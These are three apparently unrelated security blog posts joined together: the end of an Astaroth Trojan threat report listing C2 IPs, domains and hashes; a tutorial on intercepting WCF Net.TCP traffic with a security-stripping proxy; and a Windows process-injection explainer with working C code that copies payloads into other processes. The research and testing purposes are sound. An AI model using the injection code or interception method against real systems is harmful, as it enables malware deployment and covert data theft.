  • Passwords of MSN Messenger and Windows Messenger accounts.
  • Internet Explorer 7.x and 8.x passwords from password-protected web sites that include Basic Authentication or Digest Access Authentication.
  • The item name of Internet Explorer 7 passwords that always begin with Microsoft_WinInet prefix.
  • The passwords stored by Remote Desktop 6. 

NetPass usage.

ATTACK FLOW AND EXFILTRATION

After injecting into the targeted processes, the modules continue their malicious activity through those processes. The malware executes malicious activity in a small period of time through the target process, deletes itself, and then repeats. This occurs periodically and is persistent.

3 ways

The malware’s different functionality.

Once the targeted processes are infected by the malicious modules, they begin communicating with the payload C2 server and exfiltrating information saved to the r1.log file. The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform.

The malicious use of GAS Tecnologia security process unins000.exe. 

Data exfiltration from unins000.exe to a malicious IP. 

CONCLUSION

Our Active Hunting Service was able to detect both the malicious use of the BITSAdmin utility and the WMIC utility. Our customer immediately stopped the attack using the remediation section of our platform and prevented any exfiltration of data. From there, our hunting team identified the rest of the attack and completed a thorough analysis.

We were able to detect and evaluate an evasive infection technique used to spread a variant of the Astaroth Trojan as part of a large, Brazilian-based spam campaign. In our discovery, we highlighted the use of legitimate, built-in Windows OS processes used to perform malicious activities to deliver a payload without being detected, as well as how the Astaroth Trojan operates and installs multiple modules covertly. We also showed its use of well-known tools and antivirus products to expand its capabilities. The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products. As we enter 2019, we anticipate that the use of LOLbins will likely increase. Because of the great potential for malicious exploitation inherent in the use of native processes, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.

As a result of this detection, the customer was able to contain an advanced attack before any damage was done. The Astaroth Trojan was controlled, WMIC was disabled, and the attack was halted in its tracks.

Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above. LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.

For more information on LOLbins in the wild, read our research into a different Trojan. 

LOLbins and Trojans: How the Ramnit Trojan Spreads via sLoad in a Cyberattack

INDICATORS OF COMPROMISE

SHA101782747C12Bf06A52704A144DB59FEC41B3CB36HashNF-e513468.zip

SHA11F83403398964D4E8B6C70B171C51CD278909172HashScript.js
SHA1CE8BDB56CCAC55C6881701EBD39DA316EE7ED18DHashlrdsnhrxxfery64.~
SHA1926137A50f473BBD257CD19E207C1C9114F6B215Hashlrdsnhrxxfery98.~
SHA15579E03EB1DA076EF939196CB14F8B769F30A302Hashlrdsnhrxxferyb.jpg
SHA1B2734835888756929EE3FF4DCDE85080CB299D2AHashlrdsnhrxxferyc.jpg
SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferydwwn.gif
SHA1EAE82A63A980998F8D388BCCE7D967F28309F593Hashlrdsnhrxxferydwwn.gif
SHA19CD5A399C9320CBFB87C9D1CAD3BC366FB12E54FHashlrdsnhrxxferydx.gif
SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferye.jpg
SHA14CDE9A53A9A49D606BC89E74D47398A69E767056Hashlrdsnhrxxferyg.gif
SHA1F99319B1B321AE9F2D1F0361BC756A43D25444CEHashlrdsnhrxxferygx.gif
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1FAHashlrdsnhrxxferyxa.~
SHA177809236FDF621ABE37B32BF073B0B893E9CE67AHashlrdsnhrxxferyxb.~
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1fAHashlrdsnhrxxferyxa.~
SHA1C2F3350AC58DE900768032554C009C4A78C47CCCHashr1.log

104.129.204[.]41
IPC2

63.251.126[.]7
IPC2

195.157.15[.]100
IPC2

173.231.184[.]59
IPC2

64.95.103[.]181
IPC2

19analiticsx00220a[.]com
DomainC2

qnccmvbrh.wilstonbrwsaq[.]pw
DomainC2

Pentesting Webservices with Net.TCP Binding

Original text

Hi all,

Most of you that are  pentesters  may have already tested plenty of webservices using SOAP (Simple Object Access Protocol)for communication. Typically, such SOAP messages are transferred over HTTP (Hypertext Transfer Protocol) and are encapsulated in XML (Extensible Markup Language). Microsoft has developed different representations of this protocols to reduce the network load. As these representations/protocols aren’t really covered by typical tools out there, this post will show you some of them, and a proxy which can be used to simplify the testing.

A typical SOAP request over HTTP looks like the one you’ll find below.

POST http://localhost/Service1 HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: application/soap+xml;charset=UTF-8;action="http://tempuri.org/IService1/GetData"
Content-Length: 440
Host: localhost
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
               xmlns:tem="http://tempuri.org/">
   <soap:Header xmlns:wsa="http://www.w3.org/2005/08/addressing">
       <wsa:Action>http://tempuri.org/IService1/GetData</wsa:Action>
       <wsa:To>http://localhost/Service1</wsa:To>
   </soap:Header>
   <soap:Body>
      <tem:GetData>
         <tem:value>12345</tem:value>
      </tem:GetData>
   </soap:Body>
</soap:Envelope>

This also results in a typical XML based response:

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: application/soap+xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 28 Jul 2016 11:13:31 GMT

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
            xmlns:a="http://www.w3.org/2005/08/addressing">
    <s:Header>
        <a:Action s:mustUnderstand="1">http://tempuri.org/IService1/GetDataResponse</a:Action>
        <ActivityId CorrelationId="ed341f95-b902-45bd-81fd-37419a72cd44"
                    xmlns="http://schemas.microsoft.com/2004/09/ServiceModel/Diagnostics">da3fe24f-3efa-4222-913a-2e5814904a6d</ActivityId>
    </s:Header>
    <s:Body>
        <GetDataResponse xmlns="http://tempuri.org/">
            <GetDataResult>You entered: 12345</GetDataResult>
        </GetDataResponse>
    </s:Body>
</s:Envelope>

Let’s see which protocols are used here… First of all, we’ve the link layer (ethernet most of the time), second the internet layer (IPv4|IPv6), next comes TCP, optionally TLS, now HTTP, and finally SOAP. As you may notice, SOAP and HTTP especially introduce a lot of repetitive data and speaking identifiers. This is great for humans, but bad in the case of network load. One of the optimizations done by Microsoft  in the WCF (Windows Communication Foundation) library was the .Net Binary Format: XML Data Structure [MC-NBFX] and based on that [MC-NBFS] and [MC-NBFSE] for SOAP. Some of the long time readers might remember that I’d already written a library for de- and encoding of this binary representation back in 2011(meanwhile also published on github). With this library, you’re able to read and modify requests and responses from webservices which do not support the XML based encoding. The same request from above could be represented in NBFS:

POST http://localhost/Service1 HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: application/soap+msbin1;charset=UTF-8;action="http://tempuri.org/IService1/GetData"
Content-Length: 228
Host: localhost
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Csoap
       soap	temhttp://tempuri.org/Csoap
                                             wsaCwsa
�Hhttp://tempuri.org/IService1/GetDataCwsa
                                           �2http://localhost/Service1CsoapAtemGetDataAtemvalue�90

or as displayed in a hex viewer:

00000000: 4304 736f 6170 020b 0473 6f61 7004 0903  C.soap...soap...
00000010: 7465 6d13 6874 7470 3a2f 2f74 656d 7075  tem.http://tempu
00000020: 7269 2e6f 7267 2f43 0473 6f61 7008 0b03  ri.org/C.soap...
00000030: 7773 6106 4303 7773 610a b748 6800 7400  wsa.C.wsa..Hh.t.
00000040: 7400 7000 3a00 2f00 2f00 7400 6500 6d00  t.p.:././.t.e.m.
00000050: 7000 7500 7200 6900 2e00 6f00 7200 6700  p.u.r.i...o.r.g.
00000060: 2f00 4900 5300 6500 7200 7600 6900 6300  /.I.S.e.r.v.i.c.
00000070: 6500 3100 2f00 4700 6500 7400 4400 6100  e.1./.G.e.t.D.a.
00000080: 7400 6100 4303 7773 610c b732 6800 7400  t.a.C.wsa..2h.t.
00000090: 7400 7000 3a00 2f00 2f00 6c00 6f00 6300  t.p.:././.l.o.c.
000000a0: 6100 6c00 6800 6f00 7300 7400 2f00 5300  a.l.h.o.s.t./.S.
000000b0: 6500 7200 7600 6900 6300 6500 3100 0143  e.r.v.i.c.e.1..C
000000c0: 0473 6f61 700e 4103 7465 6d07 4765 7444  .soap.A.tem.GetD
000000d0: 6174 6141 0374 656d 0576 616c 7565 8b39  ataA.tem.value.9
000000e0: 3001 0101                                0...

As you may notice, some of the xml tag names are gone as for example Envelope, Header or Body. This is because MC-NBFS uses a predefined dictionary to represent most of the strings occurring in SOAP messages by a one or two byte value (if you are interested how the dictionary looks like: https://github.com/ernw/python-wcfbin/blob/develop/wcf/dictionary.py)

If it is still transported over HTTP, you’re done and fully able to test and interact with the webservice as if it was communicating over XML-SOAP.

During your tests, you may find a client which is communicating with a webservice, but not over HTTP and it’s not using SOAP (but something which looks like the NBF above). This is typically the same type of webservice, but this time it does not use the so called HTTP-binding, but the Net.TCP one. This binding is used by WCF applications to remove the parsing overhead of HTTP and add more reliability. It is based on the .NET Message Framing Protocol [MC-NMF] and is defined in [MS-NMTFB]. It’s packets follow a type-value format:

 0                   1                   2                   3  
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+---------------------------------------------------------------+
|  RecordType   |                                               
                      Value...                                  
+---------------------------------------------------------------+

This protocol runs on top of TCP and does some sort of handshake which specifies the used transport encoding (typically NBFSE), the targeted service and an optional transport encryption/protection.

00000000  0001 0001 0202 246e 6574 2e74 6370 3a2f ......$net.tcp:/
00000010  2f31 3932 2e31 3638 2e35 362e 313a 3835 /192.168.56.1:85
00000020  3233 2f53 6572 7669 6365 3103 080c      23/Service1...
    00000000  0b                                               .
0000002E  06b0 016c 2468 7474 703a 2f2f 7465 6d70 ...l$http://temp
0000003E  7572 692e 6f72 672f 4953 6572 7669 6365 uri.org/IService
0000004E  312f 4765 7444 6174 6124 6e65 742e 7463 1/GetData$net.tc
0000005E  703a 2f2f 3139 322e 3136 382e 3536 2e31 p://192.168.56.1
0000006E  3a38 3532 332f 5365 7276 6963 6531 0747 :8523/Service1.G
0000007E  6574 4461 7461 1368 7474 703a 2f2f 7465 etData.http://te
0000008E  6d70 7572 692e 6f72 672f 0576 616c 7565 mpuri.org/.value
0000009E  5602 0b01 7304 0b01 6106 5608 440a 1e00 V...s...a.V.D...
000000AE  82ab 0144 1aad 9ddf 13ad aa57 0140 8fe2 ...D.......W.@..
000000BE  2830 d9d9 e8e7 442c 442a ab14 0144 0c1e (0....D,D*...D..
000000CE  0082 ab03 0156 0e42 050a 0742 098b 3905 .....V.B...B..9.
000000DE  0101 01                                 ...
    00000001  06bd 025f 2c68 7474 703a 2f2f 7465 6d70 ..._,http://temp
    00000011  7572 692e 6f72 672f 4953 6572 7669 6365 uri.org/IService
    00000021  312f 4765 7444 6174 6152 6573 706f 6e73 1/GetDataRespons
    00000031  650f 4765 7444 6174 6152 6573 706f 6e73 e.GetDataRespons
    00000041  6513 6874 7470 3a2f 2f74 656d 7075 7269 e.http://tempuri
    00000051  2e6f 7267 2f0d 4765 7444 6174 6152 6573 .org/.GetDataRes
    00000061  756c 7456 020b 0173 040b 0161 0656 0844 ultV...s...a.V.D
    00000071  0a1e 0082 ab01 400a 4163 7469 7669 7479 ......@.Activity
    00000081  4964 040d 436f 7272 656c 6174 696f 6e49 Id..CorrelationI
    00000091  6498 2436 3038 3538 3730 642d 3835 3264 d.$6085870d852d
    000000A1  2d34 6236 322d 3931 6437 2d61 3563 6334 -4b6291d7a5cc4
    000000B1  3530 3361 3635 3808 3d68 7474 703a 2f2f 503a658.=http://
    000000C1  7363 6865 6d61 732e 6d69 6372 6f73 6f66 schemas.microsof
    000000D1  742e 636f 6d2f 3230 3034 2f30 392f 5365 t.com/2004/09/Se
    000000E1  7276 6963 654d 6f64 656c 2f44 6961 676e rviceModel/Diagn
    000000F1  6f73 7469 6373 b167 9317 e29b 145e 4685 ostics.g.....^F.
    00000101  3657 8293 1d6b 8644 12ad 9ddf 13ad aa57 6W...k.D.......W
    00000111  0140 8fe2 2830 d9d9 e8e7 440c 1e00 82ab .@..(0....D.....
    00000121  1401 560e 4203 0a05 4207 9911 596f 7520 ..V.B...B...You 
    00000131  656e 7465 7265 643a 2031 3333 3701 0101 entered: 1337...
000000E1  0642 0056 020b 0173 040b 0161 0656 0844 .B.V...s...a.V.D
000000F1  0a1e 0082 ab01 441a adf8 4321 1e83 4c8f ......D...C!..L.
00000101  4e8f 0ce4 7db9 cf3a 6744 2c44 2aab 1401 N...}..:gD,D*...
00000111  440c 1e00 82ab 0301 560e 4205 0a07 4209 D.......V.B...B.
00000121  8101 0101                               ....
    00000141  06db 0100 5602 0b01 7304 0b01 6106 5608 ....V...s...a.V.
    00000151  440a 1e00 82ab 0140 0a41 6374 6976 6974 D......@.Activit
    00000161  7949 6404 0d43 6f72 7265 6c61 7469 6f6e yId..Correlation
    00000171  4964 9824 3639 3837 3737 6665 2d65 3637 Id.$6987 77fee67
    00000181  322d 3461 6332 2d62 3163 642d 6239 6237 2-4ac2b1cdb9b7
    00000191  3464 3134 3739 6538 083d 6874 7470 3a2f 4d1479e8.=http:/
    000001A1  2f73 6368 656d 6173 2e6d 6963 726f 736f /schemas .microso
    000001B1  6674 2e63 6f6d 2f32 3030 342f 3039 2f53 ft.com/2004/09/S
    000001C1  6572 7669 6365 4d6f 6465 6c2f 4469 6167 erviceModel/Diag
    000001D1  6e6f 7374 6963 73b1 bef9 db6d 9c99 8b4e nostics....m...N
    000001E1  9a14 0ebf 2d69 41a2 4412 adf8 4321 1e83 ....-iA.D...C!..
    000001F1  4c8f 4e8f 0ce4 7db9 cf3a 6744 0c1e 0082 L.N...}..:gD....
    00000201  ab14 0156 0e42 030a 0542 0799 0e59 6f75 ...V.B...B...You
    00000211  2065 6e74 6572 6564 3a20 3001 0101       entered: 0...
00000125  07                                               .
    0000021F  07                                               .

The first 32 bytes in the capture could be decoded as:

VersionRecord(Major=1, Minor=0)
ModeRecord(Mode=DUPLEX)
ViaRecord(Length=0x24, Via="net.tcp://192.168.56.1:8523/Service1")
KnownEncodingRecord(Encoding=BINARY_DICT)
PreambleEndRecord()

Note: BINARY_DICT means MC-NBFSE in this case.

The server acknowledges the connection (0xb) and the actual messages are transferred in the specified encoding (BINARY_DICT), encapsulated in an additional message which prefixes the data with the data length. As you may see, the data sent to server in the second request (the part at 0xE1 to 0x121) is much smaller than the first one. This is because MC-NBFSE defines that a custom dictionary is transfered at the beginning of the first request. All subsequent requests will use this extended dictionary and will transfer only the identifiers (the same applies to the responses).

With this knowledge, you’ll be  able to, at least, extract the requests and responses and decode them with my wcfbin library. But as I noted before, the NMF protocol allows to establish a secured connection. This could be either done by TLS or by GSSAPI. If one of them is used, you’ll be unable to view nor modify the SOAP calls between a client and a server. Additionally, if you’ve the client software and the server requires to authenticate via GSSAPI (Kerberos) and your machine is not part of the domain, it’ll be rather difficult to convince the client software to authenticate with the correct credentials, as this is completely done in the background.

But luckily (especially if we have the client under our control) we can implement a proxy between the client and the server, which would

  1. decode and display the transferred messages
  2. establish a secured connection to the server while the connection to the client is unsecured (like sslstrip)
  3. can be adjusted to modify requests/responses on the fly to bypass some client side restrictions

So lets see how a a proxied connection would look like. First of all, you’ll need the library itself (you can find it here). To install it with pip, just run:

pip install git+https://github.com/ernw/net.tcp-proxy.git

If you like to have some colorful hexdumps you’ll also need my utility library:

pip install git+https://github.com/bluec0re/python-helperlib.git

If you want to connect to a webservice using kerberos authentication (more on this later), gssapi is also required (python2 only!):

pip install gssapi

After installation, you’ll find 3 scripts in your binary folder: decode-nmf.py, decode-wcfbin.py and nettcp-proxy.py

The decode-* scripts can be used to decode trace files which are generated by the proxy (you’ll need the wcfbin decoder mentioned above for the decode-wcfbin script). To generate such trace files (and view the traffic between a client and a server) you can use the nettcp-proxy script as follows:

nettcp-proxy.py -b <ip address to bind to> -p <port to bind to> -t <name of the tracefile> <serverip> <serverport>

The result can be seen in the following asciicast (you may want to reduce the playing speed (“<” key) as the output comes fast)

If you want to connect to a webservice which is using the negotiate protocol, some additional steps are required. First you’ll need the krb5 library and the gssapi python bindings (mentioned above). Second, you’ll have to configure the krb library to authenticate against the KDC of the domain. If you’re lucky, a

kinit user@domain

is enough (you’ll be prompted for the user password and the klist command will show a obtained ticket). If not, you’ll need to specify the target KDC in the krb5.conf file:

[logging]
default = STDERR

[libdefaults]
ticket_lifetime = 24h
clock-skew = 300
default_realm = test.local
dns_lookup_realm = true
dns_lookup_kdc = true
forwardable = true
renew_lifetime = 7d

[realms]
FOODOMAIN = {
  kdc = 127.0.0.1:88
  admin_server = 127.0.0.1:464
}

[domain_realm]
foodomain = FOODOMAIN

(adjust the FOODOMAIN and the ips according to your environment).

The next thing you need is a ticket for the target system (the actual service name might be different):

kvno host@service.domain

In the last step, the client has to be configured to not use any transport level authentication. This could be done by adjusting the *.config file which typically comes with such clients:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    </startup>
    <system.serviceModel>
        <bindings>
            <netTcpBinding>
                <binding name="NetTcpBinding_IService1">
                    <security mode="None" />
                </binding>
            </netTcpBinding>
        </bindings>
        <client>
            <endpoint address="net.tcp://192.168.56.1:8523/Service1" binding="netTcpBinding"
                bindingConfiguration="NetTcpBinding_IService1" contract="ServiceReference1.IService1"
                name="NetTcpBinding_IService1">
                <identity>
                    <dns value="localhost" />
                </identity>
            </endpoint>
        </client>
    </system.serviceModel>
</configuration>

The important part here is the <security mode="None" /> which has to be assigned to the specific endpoint (by using the <binding name parameter and the <endpoint bindingConfiguration parameter).

Last but not least you use the nettcp-proxy script as before but additionally specify the service name used with krb5:

nettcp-proxy.py -b <ip address to bind to> -p <port to bind to> -t <name of the tracefile> -n host@service.domain <serverip> <serverport>

That’s all folks. You are now able to view and decode requests going from clients to webservices over the nettcp binding. Additionally, you can use the library to inject your own requests by either doing it directly in python or by connecting to the proxy and let him do the authentication stuff.

That’s it, if you have any questions don’t hesitate to ask, if you find any bugs feel free to report it at github or (even better) fix it right away.

Best & happy hacking,

Github: https://github.com/ernw/net.tcp-proxy

Windows Process Injection: Sharing the payload

Original text

Introduction

The last post discussed some of the problems when writing a payload for process injection. The purpose of this post is to discuss deploying the payload into the memory space of a target process for execution. One can use conventional Win32 API for this task that some of you will already be familiar with, but there’s also the potential to be creative using unconventional approaches. For example, we can use API to perform read and write operations they weren’t originally intended for, that might help evade detection. There are various ways to deploy and execute a payload, but not all are simple to use. Let’s first focus on the conventional API that despite being relatively easy to detect are still popular among threat actors.

Below is a screenshot of VMMap from sysinternals showing the types of memory allocated for the system I’ll be working on (Windows 10). Some of this memory has the potential to be used for storage of a payload.

Allocating virtual memory

Each process has its own virtual address space. Shared memory exists between processes, but in general, process A should not be able to view the virtual memory of process B without assistance from the Kernel. The Kernel can of course see the virtual memory of all processes because it has to perform virtual to physical memory translation. Process A can allocate new virtual memory in the address space of process B using Virtual Memory API that is then handled internally by the Kernel. Some of you may be familiar with the following steps to deploy a payload in virtual memory of another process.

  1. Open a target process using OpenProcess or NtOpenProcess.
  2. Allocate eXecute-Read-Write (XRW) memory in a target process using VirtualAllocEx or NtAllocateVirtualMemory.
  3. Copy a payload to the new memory using WriteProcessMemory or NtWriteVirtualMemory.
  4. Execute payload.
  5. De-allocate XRW memory in target process using VirtualFreeEx or NtFreeVirtualMemory.
  6. Close target process handle with CloseHandle or NtClose.

Using the Win32 API. This only shows the allocation of XRW memory and writing the payload to new memory.

PVOID CopyPayload1(HANDLE hp, LPVOID payload, ULONG payloadSize){
    LPVOID ptr=NULL;
    SIZE_T tmp;
    
    // 1. allocate memory
    ptr = VirtualAllocEx(hp, NULL, 
      payloadSize, MEM_COMMIT|MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);
      
    // 2. write payload
    WriteProcessMemory(hp, ptr, 
      payload, payloadSize, &tmp);
    
    return ptr;
}

Alternatively using the Nt/Zw API.

LPVOID CopyPayload2(HANDLE hp, LPVOID payload, ULONG payloadSize){
    LPVOID   ptr=NULL;
    ULONG    len=payloadSize;
    NTSTATUS nt;
    ULONG    tmp;
    
    // 1. allocate memory
    NtAllocateVirtualMemory(hp, &ptr, 0, 
      &len, MEM_COMMIT|MEM_RESERVE,
      PAGE_EXECUTE|PAGE_READWRITE);
      
    // 2. write payload
    NtWriteVirtualMemory(hp, ptr, 
      payload, payloadSize, &tmp);
    
    return ptr;
}

Although not shown here, an additional operation to remove Write permissions of the virtual memory might be used.

Create a section object

Another way is using section objects. What does Microsoft say about them?

A section object represents a section of memory that can be shared. A process can use a section object to share parts of its memory address space (memory sections) with other processes. Section objects also provide the mechanism by which a process can map a file into its memory address space.

Although the use of these API in a regular application is an indication of something malicious, threat actors will continue to use them for process injection.

  1. Create a new section object using NtCreateSection and assign to S.
  2. Map a view of S for attacking process using NtMapViewOfSection and assign to B1.
  3. Map a view of S for target process using NtMapViewOfSection and assign to B2.
  4. Copy a payload to B1.
  5. Unmap B1.
  6. Close S
  7. Return pointer to B2.
LPVOID CopyPayload3(HANDLE hp, LPVOID payload, ULONG payloadSize){
    HANDLE        s;
    LPVOID        ba1=NULL, ba2=NULL;
    ULONG         vs=0;
    LARGE_INTEGER li;

    li.HighPart = 0;
    li.LowPart  = payloadSize;
    
    // 1. create a new section
    NtCreateSection(&s, SECTION_ALL_ACCESS, 
      NULL, &li, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);

    // 2. map view of section for current process
    NtMapViewOfSection(s, GetCurrentProcess(),
      &ba1, 0, 0, 0, &vs, ViewShare,
      0, PAGE_EXECUTE_READWRITE);
    
    // 3. map view of section for target process  
    NtMapViewOfSection(s, hp, &ba2, 0, 0, 0, 
      &vs, ViewShare, 0, PAGE_EXECUTE_READWRITE); 
    
    // 4. copy payload to section of memory
    memcpy(ba1, payload, payloadSize);

    // 5. unmap memory in the current process
    ZwUnmapViewOfSection(GetCurrentProcess(), ba1);
    
    // 6. close section
    ZwClose(s);
    
    // 7. return pointer to payload in target process space
    return (PBYTE)ba2;
}

Using an existing section object and ROP chain

The Powerloader malware used existing shared objects created by explorer.exe to store a payload, but due to permissions of the object (Read-Write) could not directly execute the code without the use of a Return Oriented Programming (ROP) chain. It’s possible to copy a payload to the memory, but not to execute it without some additional trickery.

The following section names were used by PowerLoader for code injection.

"\BaseNamedObjects\ShimSharedMemory"
"\BaseNamedObjects\windows_shell_global_counters"
"\BaseNamedObjects\MSCTF.Shared.SFM.MIH"
"\BaseNamedObjects\MSCTF.Shared.SFM.AMF"
"\BaseNamedObjects\UrlZonesSM_Administrator"
"\BaseNamedObjects\UrlZonesSM_SYSTEM"
  1. Open existing section of memory in target process using NtOpenSection
  2. Map view of section using NtMapViewOfSection
  3. Copy payload to memory
  4. Use a ROP chain to execute

UI Shared Memory

enSilo demonstrated with PowerLoaderEx using UI shared memory for process execution. Injection on Steroids: Codeless code injection and 0-day techniques provides more details of how it works. It uses the desktop heap for injecting the payload into explorer.exe.

Reading a Desktop Heap Overview over at MSDN, we can see there’s already shared memory between processes for the User Interface.

Every desktop object has a single desktop heap associated with it. The desktop heap stores certain user interface objects, such as windows, menus, and hooks. When an application requires a user interface object, functions within user32.dll are called to allocate those objects. If an application does not depend on user32.dll, it does not consume desktop heap.

Using a code cave

Host Intrusion Prevention Systems (HIPS) will regard the use of VirtualAllocEx/WriteProcessMemory as suspicious activity, and this is likely why the authors of PowerLoader used existing section objects. PowerLoader likely inspired the authors behind AtomBombing to use a code cave in a Dynamic-link Library (DLL) for storing a payload and using a ROP chain for execution.

AtomBombing uses a combination of GlobalAddAtomGlobalGetAtomName and NtQueueApcThread to deploy a payload into a target process. The execution is accomplished using a ROP chain and SetThreadContext. What other ways could one deploy a payload without using the standard approach?

Interprocess Communication (IPC) can be used to share data with another process. Some of the ways this can be achieved include:

  • Clipboard (WM_PASTE)
  • Data Copy (WM_COPYDATA)
  • Named pipes
  • Component Object Model (COM)
  • Remote Procedure Call (RPC)
  • Dynamic Data Exchange (DDE)

For the purpose of this post, I decided to examine WM_COPYDATA, but in hindsight, I think COM might be a better line of enquiry.

Data can be legitimately shared between GUI processes via the WM_COPYDATA message, but can it be used for process injection?. SendMessage and PostMessage are two such APIs that can be used to write data into a remote process space without explicitly opening the target process and copying data there using Virtual Memory API.

Kernel Attacks through User-Mode Callbacks presented at Blackhat 2011 by Tarjei Mandt, lead me to examine the potential for using the KernelCallbackTable located in the Process Environment Block (PEB) for process injection. This field is initialized to an array of functions when user32.dll is loaded into a GUI process and this is where I initially started looking after learning how window messages are dispatched by the kernel.

With WinDbg attached to notepad, obtain the address of the PEB.

0:001> !peb
!peb
PEB at 0000009832e49000

Dumping this in the windows debugger shows the following details. What we’re interested in here is the KernelCallbackTable, so I’ve stripped out most of the fields.

0:001> dt !_PEB 0000009832e49000
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
	
	// details stripped out
	
   +0x050 ReservedBits0    : 0y0000000000000000000000000 (0)
   +0x054 Padding1         : [4]  ""
   +0x058 KernelCallbackTable : 0x00007ffd6afc3070 Void
   +0x058 UserSharedInfoPtr : 0x00007ffd6afc3070 Void

If we dump the address 0x00007ffd6afc3070 using the dump symbol command, we see a reference to USER32!apfnDispatch.

0:001> dps $peb+58
0000009832e49058  00007ffd6afc3070 USER32!apfnDispatch
0000009832e49060  0000000000000000
0000009832e49068  0000029258490000
0000009832e49070  0000000000000000
0000009832e49078  00007ffd6c0fc2e0 ntdll!TlsBitMap
0000009832e49080  000003ffffffffff
0000009832e49088  00007df45c6a0000
0000009832e49090  0000000000000000
0000009832e49098  00007df45c6a0730
0000009832e490a0  00007df55e7d0000
0000009832e490a8  00007df55e7e0228
0000009832e490b0  00007df55e7f0650
0000009832e490b8  0000000000000001
0000009832e490c0  ffffe86d079b8000
0000009832e490c8  0000000000100000
0000009832e490d0  0000000000002000

Closer inspection of USER32!apfnDispatch reveals an array of functions.

0:001> dps USER32!apfnDispatch

00007ffd6afc3070  00007ffd6af62bd0 USER32!_fnCOPYDATA
00007ffd6afc3078  00007ffd6afbae70 USER32!_fnCOPYGLOBALDATA
00007ffd6afc3080  00007ffd6af60420 USER32!_fnDWORD
00007ffd6afc3088  00007ffd6af65680 USER32!_fnNCDESTROY
00007ffd6afc3090  00007ffd6af696a0 USER32!_fnDWORDOPTINLPMSG
00007ffd6afc3098  00007ffd6afbb4a0 USER32!_fnINOUTDRAG
00007ffd6afc30a0  00007ffd6af65d40 USER32!_fnGETTEXTLENGTHS
00007ffd6afc30a8  00007ffd6afbb220 USER32!_fnINCNTOUTSTRING
00007ffd6afc30b0  00007ffd6afbb750 USER32!_fnINCNTOUTSTRINGNULL
00007ffd6afc30b8  00007ffd6af675c0 USER32!_fnINLPCOMPAREITEMSTRUCT
00007ffd6afc30c0  00007ffd6af641f0 USER32!__fnINLPCREATESTRUCT
00007ffd6afc30c8  00007ffd6afbb2e0 USER32!_fnINLPDELETEITEMSTRUCT
00007ffd6afc30d0  00007ffd6af6bc00 USER32!__fnINLPDRAWITEMSTRUCT
00007ffd6afc30d8  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e0  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e8  00007ffd6afbb430 USER32!_fnINLPMDICREATESTRUCT

The first function, USER32!_fnCOPYDATA, is called when process A sends the WM_COPYDATA message to a window belonging to process B. The kernel will dispatch the message, including other parameters to the target window handle, that will be handled by the windows procedure associated with it.

0:001> u USER32!_fnCOPYDATA
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
00007ffd6af62bd4 33c0            xor     eax,eax
00007ffd6af62bd6 4c8bd1          mov     r10,rcx
00007ffd6af62bd9 89442438        mov     dword ptr [rsp+38h],eax
00007ffd6af62bdd 4889442440      mov     qword ptr [rsp+40h],rax
00007ffd6af62be2 394108          cmp     dword ptr [rcx+8],eax
00007ffd6af62be5 740b            je      USER32!_fnCOPYDATA+0x22 (00007ffd6af62bf2)
00007ffd6af62be7 48394120        cmp     qword ptr [rcx+20h],rax

Set a breakpoint on this function and continue execution.

0:001> bp USER32!_fnCOPYDATA
0:001> g

The following piece of code will send the WM_COPYDATA message to notepad. Compile and run it.

int main(void){
  COPYDATASTRUCT cds;
  HWND           hw;
  WCHAR          msg[]=L"I don't know what to say!\n";
  
  hw = FindWindowEx(0,0,L"Notepad",0);
  
  if(hw!=NULL){   
    cds.dwData = 1;
    cds.cbData = lstrlen(msg)*2;
    cds.lpData = msg;
    
    // copy data to notepad memory space
    SendMessage(hw, WM_COPYDATA, (WPARAM)hw, (LPARAM)&cds);
  }
  return 0;
}

Once this code executes, it will attempt to find the window handle of Notepad before sending it the WM_COPYDATA message, and this will trigger our breakpoint in the debugger. The call stack shows where the call originated from, in this case it’s from KiUserCallbackDispatcherContinue. Based on the calling convention, the arguments are placed in RCX, RDX, R8 and R9.

Breakpoint 0 hit
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
0:000> k
 # Child-SP          RetAddr           Call Site
00 0000009832caf618 00007ffd6c03dbc4 USER32!_fnCOPYDATA
01 0000009832caf620 00007ffd688d1144 ntdll!KiUserCallbackDispatcherContinue
02 0000009832caf728 00007ffd6af61b0b win32u!NtUserGetMessage+0x14
03 0000009832caf730 00007ff79cc13bed USER32!GetMessageW+0x2b
04 0000009832caf790 00007ff79cc29333 notepad!WinMain+0x291
05 0000009832caf890 00007ffd6bb23034 notepad!__mainCRTStartup+0x19f
